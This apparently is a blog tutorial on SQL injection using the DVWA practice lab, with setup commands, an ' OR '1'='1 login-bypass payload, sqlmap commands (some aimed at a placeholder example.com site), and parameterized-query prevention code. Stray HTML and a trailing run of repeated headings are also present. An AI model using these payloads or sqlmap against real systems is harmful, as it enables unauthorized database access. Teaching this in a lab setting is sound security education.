SQL Injection Demonstration - Summary

1️⃣ Set Up DVWA – Deploy the vulnerable web application and log in.
2️⃣ Set Security Level to Low – Adjust security settings to make SQL injection possible.
3️⃣ Perform SQL Injection – Enter a malicious SQL payload in the login field to bypass authentication.
4️⃣ Automate with SQLMap – Use an automated tool to scan for and exploit SQL injection vulnerabilities.
5️⃣ Conclusion – SQL injection occurs due to poor input validation. Prevent it with secure coding practices like parameterized queries.

You Should Know:

1. Setting Up DVWA (Damn Vulnerable Web Application):

Download and install DVWA on your local machine or server.

Use the following commands to set up DVWA on a Linux system:

git clone https://github.com/digininja/DVWA.git
cd DVWA
sudo apt-get install apache2 mysql-server php libapache2-mod-php php-mysql
sudo cp config/config.inc.php.dist config/config.inc.php
sudo service apache2 restart
sudo service mysql restart

Access DVWA via your browser: `http://localhost/DVWA`.

2. Setting Security Level to Low:

Log in to DVWA with the default credentials (admin/password).
Navigate to `DVWA Security` and set the security level to low.

3. Performing SQL Injection:

Go to the `SQL Injection` section in DVWA.
Enter the following payload in the input field to bypass authentication:
```
' OR '1'='1
```
This payload exploits poor input validation to gain unauthorized access.

4. Automating with SQLMap:

Use SQLMap to automate the detection and exploitation of SQL injection vulnerabilities.

Run the following command to scan for vulnerabilities:

sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=your_session_id"

SQLMap will identify and exploit the vulnerability, providing detailed results.

5. Preventing SQL Injection:

Use parameterized queries or prepared statements in your code.
Example in Python with MySQL:
```
import mysql.connector</li>
</ul>

db = mysql.connector.connect(
host="localhost",
user="root",
password="",
database="dvwa"
)

cursor = db.cursor()
query = "SELECT * FROM users WHERE id = %s"
cursor.execute(query, (user_input,))
```
– Always validate and sanitize user inputs.

What Undercode Say:

SQL injection remains one of the most critical vulnerabilities in web applications. By understanding how it works and practicing secure coding techniques, you can significantly reduce the risk of exploitation. Tools like SQLMap are invaluable for penetration testers, but prevention is always better than cure. Always use parameterized queries, validate inputs, and keep your software updated to stay ahead of potential threats.

For further reading, check out:
- OWASP SQL Injection Guide
- SQLMap Documentation
Practice Commands:
- Linux:
```
sudo apt-get install sqlmap
sqlmap -u "http://example.com/page?id=1" --dbs
```
- Windows (with Python installed):
```
pip install sqlmap
sqlmap -u "http://example.com/page?id=1" --dbs
```
- MySQL:
```
SELECT * FROM users WHERE username = 'admin' AND password = 'password' OR '1'='1';
```
Stay secure and keep learning!

References:

Reported By: Sarah Onyeoziri – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

Whatsapp
Telegram

Listen to this Post

You Should Know:

1. Setting Up DVWA (Damn Vulnerable Web Application):

2. Setting Security Level to Low:

3. Performing SQL Injection:

4. Automating with SQLMap:

5. Preventing SQL Injection:

What Undercode Say:

For further reading, check out:

Practice Commands:

Stay secure and keep learning!

References:

Join Our Cyber World:

Related Posts: